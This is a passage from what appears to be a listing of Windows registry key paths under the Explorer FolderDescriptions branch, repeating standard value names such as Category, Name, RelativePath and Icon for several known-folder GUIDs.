HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{289A9A43-BE44-4057-A41B-587A76D7E7F9}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BFEFB45-347D-4006-A5BE-AC0CB0567192}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Icon
